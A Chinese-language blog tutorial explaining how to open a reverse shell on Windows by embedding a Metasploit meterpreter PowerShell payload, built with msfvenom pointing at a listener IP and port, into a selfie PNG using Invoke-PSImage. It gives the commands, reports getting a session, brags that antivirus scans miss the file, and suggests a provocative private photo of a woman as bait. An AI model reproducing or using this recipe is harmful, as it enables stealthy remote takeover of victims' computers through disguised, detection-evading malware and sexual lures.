文章来源:洛米唯熊
0x00:前言
继前面讲到的用(看我如何利用微信反弹shell)之后,引来了很多人的围观。确实,新颖的利用方式。很有利用价值!闲话少说。今天,利用奇思妙想的方法来反弹shell。用一张自拍照。
0x01:过程
利用工具:
https://github.com/peewpw/Invoke-PSImage
一、首先利用msf创建一个ps1脚本
代码:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.124.11 LPORT=6666 -f psh-reflection -o /root/luomiweixiong.ps1
利用msf生成ps1脚本
二、找一张自拍图
(我这里用我自己的头像)
luomiweixiong.png
放在Invoke-PSImage目录下,方便执行命令的时候找文件
三、两者合并
两者合并
解释:
首先要执行“Import-Module .\Invoke-PSImage.ps1”命令。再执行“Invoke-PSImage -Script .\luomiweixiong.ps1 -Image .\luomiweixiong.png -Out .\luomiwexiong2.png“命令进行两者合并。
第1个解释中的命令解释:导入模块。
第2个解释中的命令分解:luomiweixiong.ps1为msf生成的ps1文件。luomiweixiong.png为原来的头像文件。luomiwexiong2.png为生成后的头像文件。
生成后的文件会比原来的大。emmm 大重点是 还是显示原来的头像
四、监听
老生常谈的方式,不会的请出门左转.
百度一下
五、见证奇迹
exploit开始攻击,运行生成后的
"luomiweixiong2.png"文件,查看效果
是的。没错。获取到会话了
六、查杀
1、本地查杀 2345安全卫士表示没问题
2、在线查杀
表示没有压力
0x02:后话
其实还可以更加隐蔽的合并两者,并有更好的效果。比如诱人的小姐姐私房自拍照。